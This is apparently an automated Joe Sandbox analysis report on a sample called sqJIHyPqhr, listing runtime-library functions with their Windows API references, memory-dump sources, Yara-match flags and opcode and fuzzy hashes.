                                                                      • String ID: pScheduler
                                                                      • API String ID: 1381464787-923244539
                                                                      • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                      • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                                      • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                      • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                                      APIs
                                                                      • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                      • String ID: pContext
                                                                      • API String ID: 1990795212-2046700901
                                                                      • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                      • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                      • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                      • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                      • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                      • _free.LIBCMT ref: 0042E069
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: CloseFreeHandleLibrary_free
                                                                      • String ID: B
                                                                      • API String ID: 621396759-3071617958
                                                                      • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                      • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                      • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                      • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                      APIs
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                      • String ID: pScheduler$version
                                                                      • API String ID: 1687795959-3154422776
                                                                      • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                      • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                      • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                      • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __alldvrm$_strrchr
                                                                      • String ID:
                                                                      • API String ID: 1036877536-0
                                                                      • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                      • Instruction ID: b4405464e19b0dc298fad9744c80a1f53af14036d9757ee6f985d8047dda8329
                                                                      • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                      • Instruction Fuzzy Hash: BEA17971A003869FEB21CF18C8A17AEBFE1EF15314F58856FD4959B381CB348941CB60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: __alldvrm$_strrchr
                                                                      • String ID:
                                                                      • API String ID: 1036877536-0
                                                                      • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                      • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                                      • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                      • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                      • Instruction ID: e7df2c428167953df3a8ce607b34c69569abfb84f586d545c4d94771cc70ca27
                                                                      • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                      • Instruction Fuzzy Hash: C2412C31A005016BDB356FBE8C64BAF3AA6EF45770F25061FF42BD6790D73484458A61
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                      • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                                      • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                      • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024D047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024D6B51
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024D6BDA
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024D6BEC
                                                                      • __freea.LIBCMT ref: 024D6BF5
                                                                        • Part of subcall function 024D390E: RtlAllocateHeap.NTDLL(00000000,024ADAD7,00000000), ref: 024D3940
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                      • String ID:
                                                                      • API String ID: 2652629310-0
                                                                      • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                      • Instruction ID: 557f8b47102cdc03be34a57eac576b1a8ea27deb4fb7d79e6864e6129abe93c3
                                                                      • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                      • Instruction Fuzzy Hash: EB31F232A0021AABDF24CF69DC50DAF7BA9EF40714F16426EEC04D7250EB36D951CB90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                                                      • String ID:
                                                                      • API String ID: 531285432-0
                                                                      • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                      • Instruction ID: c3fe6b64d0a456c139dcdf6359c73c9aa77648c972055175234ff4c0cb64a553
                                                                      • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                      • Instruction Fuzzy Hash: CF214C75E00209AFDF04EFA5CC919BEB7B9EF19714F10006AE501A7290D774AD018BA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                                                      • String ID:
                                                                      • API String ID: 531285432-0
                                                                      • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                      • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                                      • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                      • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                                      APIs
                                                                      • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                        • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                      • String ID:
                                                                      • API String ID: 2630251706-0
                                                                      • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                      • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                                      • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                      • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                                      APIs
                                                                      • ShowWindow.USER32(00000005), ref: 00401FAF
                                                                      • UpdateWindow.USER32 ref: 00401FB7
                                                                      • ShowWindow.USER32(00000000), ref: 00401FCB
                                                                      • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$MoveUpdate
                                                                      • String ID:
                                                                      • API String ID: 1339878773-0
                                                                      • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                      • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                                      • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                      • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 024C934A
                                                                        • Part of subcall function 024C9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024C92C6
                                                                        • Part of subcall function 024C9297: ___AdjustPointer.LIBCMT ref: 024C92E1
                                                                      • _UnwindNestedFrames.LIBCMT ref: 024C935F
                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024C9370
                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 024C9398
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                      • String ID:
                                                                      • API String ID: 737400349-0
                                                                      • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                      • Instruction ID: ad27e341c46a535322c0f513c487e74181f2019cfbe5bf93ed3580ad009ddaec
                                                                      • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                      • Instruction Fuzzy Hash: 1D011776100148BBCF526E9ADC40EEB7F6AEF88754F15441DFE4896120D772E861ABA0
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                        • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                        • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                                      • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                      • String ID:
                                                                      • API String ID: 737400349-0
                                                                      • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                      • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                      • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                      • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024D513D,00000000,00000000,00000000,00000000,?,024D53F5,00000006,0044A378), ref: 024D51C8
                                                                      • GetLastError.KERNEL32(?,024D513D,00000000,00000000,00000000,00000000,?,024D53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024D2213), ref: 024D51D4
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024D513D,00000000,00000000,00000000,00000000,?,024D53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024D51E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                      • Instruction ID: 552dda3732bb3c52ecd014d8ceae91a5cf7b332597ad1a6936fb260408ad7ce7
                                                                      • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                      • Instruction Fuzzy Hash: 04012B36B02222ABC7224F799C54F5BBB98BF46FA27500631F906E7240CF20D941CAE4
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                                      • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                      • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                                      • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                      • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                                      APIs
                                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024C63AF
                                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024C63C3
                                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024C63DB
                                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024C63F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                      • String ID:
                                                                      • API String ID: 78362717-0
                                                                      • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                      • Instruction ID: c2b02142adbf2f68e3881d67e48a27cd00d560d4dc489de0a02583b256b3062f
                                                                      • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                      • Instruction Fuzzy Hash: 2901A23A600114A7CF56EA5DC840AEF779E9FC5350F11401FEC21AB391DAB0ED118AA0
                                                                      APIs
                                                                      • Concurrency::location::_Assign.LIBCMT ref: 024C2BB1
                                                                      • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024C2BCF
                                                                        • Part of subcall function 024B8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024B86A8
                                                                        • Part of subcall function 024B8687: Hash.LIBCMT ref: 024B86E8
                                                                      • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024C2BD8
                                                                      • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024C2BF8
                                                                        • Part of subcall function 024BF6DF: Hash.LIBCMT ref: 024BF6F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                      • String ID:
                                                                      • API String ID: 2250070497-0
                                                                      • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                      • Instruction ID: e755e83e7e048e2417bcd282ecff3cd39d6bce6465bb2aa26793613a3b829afc
                                                                      • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                      • Instruction Fuzzy Hash: 2C118E76400204AFC715DF65C880ACAF7B9BF59320F114A1FE95A8B551DBB0E904CBA0
                                                                      APIs
                                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                      • String ID:
                                                                      • API String ID: 78362717-0
                                                                      • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                      • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                                      • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                      • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                                      APIs
                                                                      • Concurrency::location::_Assign.LIBCMT ref: 024C2BB1
                                                                      • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024C2BCF
                                                                        • Part of subcall function 024B8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024B86A8
                                                                        • Part of subcall function 024B8687: Hash.LIBCMT ref: 024B86E8
                                                                      • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024C2BD8
                                                                      • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024C2BF8
                                                                        • Part of subcall function 024BF6DF: Hash.LIBCMT ref: 024BF6F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                      • String ID:
                                                                      • API String ID: 2250070497-0
                                                                      • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                      • Instruction ID: 9830d28ee56cb83da3187a44ff44ae78c7ec6b5f86b5e4074c4520d4fafb5f72
                                                                      • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                      • Instruction Fuzzy Hash: 82012D76400604ABC715DF6AC881EDAF7E9FF58710F108A1EE55A87550DBB0F544CF60
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 024A50D1
                                                                        • Part of subcall function 024ABDAE: __EH_prolog3_GS.LIBCMT ref: 024ABDB5
                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 024A511C
                                                                      • __Getcoll.LIBCPMT ref: 024A512B
                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024A513B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                      • String ID:
                                                                      • API String ID: 1836011271-0
                                                                      • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                      • Instruction ID: 1278e48d33d17da6739158dad9f9efbb80f4788ec16d9928856ea121f5172e9f
                                                                      • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                      • Instruction Fuzzy Hash: 540165B1D10208AFEB01EFA5C4A0BADB7B1FF64316F50802FD055AB280DB749544CFA1
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 024A5B8D
                                                                        • Part of subcall function 024ABDAE: __EH_prolog3_GS.LIBCMT ref: 024ABDB5
                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 024A5BD8
                                                                      • __Getcoll.LIBCPMT ref: 024A5BE7
                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024A5BF7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                      • String ID:
                                                                      • API String ID: 1836011271-0
                                                                      • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                      • Instruction ID: 50602bb7f60c363817f15a9883b04c6af86cea9b72a2fd49315f2a809f593f15
                                                                      • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                      • Instruction Fuzzy Hash: 44018C71D002089FEB00EFA5C590BDEB7B1BF24315F50802FD0556B280DB789544CF90
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                                        • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                                      • __Getcoll.LIBCPMT ref: 00405980
                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                      • String ID:
                                                                      • API String ID: 1836011271-0
                                                                      • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                      • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                                      • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
